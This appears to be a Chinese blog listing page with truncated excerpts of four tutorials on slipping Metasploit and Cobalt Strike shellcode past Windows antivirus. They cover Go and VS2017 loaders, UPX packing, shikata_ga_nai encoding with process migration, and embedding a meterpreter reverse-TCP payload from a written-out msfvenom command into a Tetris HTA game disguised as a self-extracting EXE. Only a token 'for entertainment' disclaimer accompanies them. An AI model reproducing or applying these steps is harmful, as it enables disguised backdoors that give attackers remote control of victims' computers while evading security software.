MacOS下使用GO语言加载shellcode过windows下各种AV

设置MacOS下go环境变量GOOS为windows,CGO_ENABLED为0,编译后即可生成exe文件给windows使用 使用msf生成shellcode-hex: 之后,新建一个test.go文件,输入以下内容,保存: 其中shellcode的hex编码填写metasploit生成的即可。然后使用命令编译生成test.exe 看效果: 之后,还可以使用upx命令对其进行加壳压缩,这一步对过杀软有弊无益,只是为了压缩减小可执行文件,其他的毫无用处,还会带来杀软敏感检测,因为杀软对upx壳子的PE文件检查更严格。不过在考虑过指定杀软的时候,此操作一试。(例如:别的杀软都可以过,就一个360过不了,可以尝试此方法后,有概率过)

查看全部


俄罗斯方块加入反弹后门方法(免杀)

注:免责申明,该方法只是用来娱乐,切勿做任何违法行为。一、主要步骤:1.制作一个hta(http application)游戏,文中用的是俄罗斯方块2.用msf生成一个hta-psh 嵌入到hta游戏里面3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标(安全,过杀软)最终效果如下: 开始: 1.制作一个hta游戏,俄罗斯方块,hta代码如下:(也可以找其他游戏替代) 将下列代码保存为后缀为hta文件,打开看看能不能运行,然后继续…. 2.用msf生成一个hta-psh 嵌入到hta游戏里面 使用msfconsole -n进入msf(最新版msf需要进入后才能使用msfvenom命令) msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f ht […]

查看全部


使用vs2017把shellcode编译成exe运行

1.打开vs2017 C++开发(如果把shellcode生成linux下的elf文件,需要对应的linux shellcode payload,并安装vs2017 linux开发功能,其它如下流程完成即可),新建一个项目: 2.选择好visual C++,然后选择 Windows桌面应用程序,如果是为了把msf生成的shellcode编译成免杀exe,一定要选这个。选其它的生成的exe会报错,或者黑框框一闪而过。然后设置一下这个项目即将保存的路径,点击确定就好。 3.选择要生成的exe版本(debug/release),还有就是对应的x86还是x64系统上运行。然后把你msf生成的shellcode或者自己写的shellcode丢进来。 4.选择调试—->属性,来配置即将生成的exe相关设置。 5.设置”代码生成”功能,”启用最小重新 […]

查看全部


使用shellcode制作免杀payload

1.shellcode具体怎么生成,可以借助cobalt straike 或者msf,还可以自己折腾 2.这里举例msf 多次尝试使用x86/shikata_ga_nai 编码十五六次后,生成的shellcode用vs2007 生成exe文件,可以过杀软,360或者安全管家 这里主要说明两个参数: PrependMigrate 设置为true以后,shellcode注入后将会实现进程注入,具体要注入到什么进程里,需要设置PrependMigrateProc 值。 这里不建议注入到lsass或者csrss 系统进程中,具体的不怕折腾可以多研究一下,要不蓝屏,要不断了以后就不会再回连。 其他进程怎么找,各种一句话shell里执行 tasklist…. 3.之后把生成的shellcode 放到 c/c++ 编译工具里或者放到 vc2017编译生成,这里使用vs2017 代码如下: 编 […]

查看全部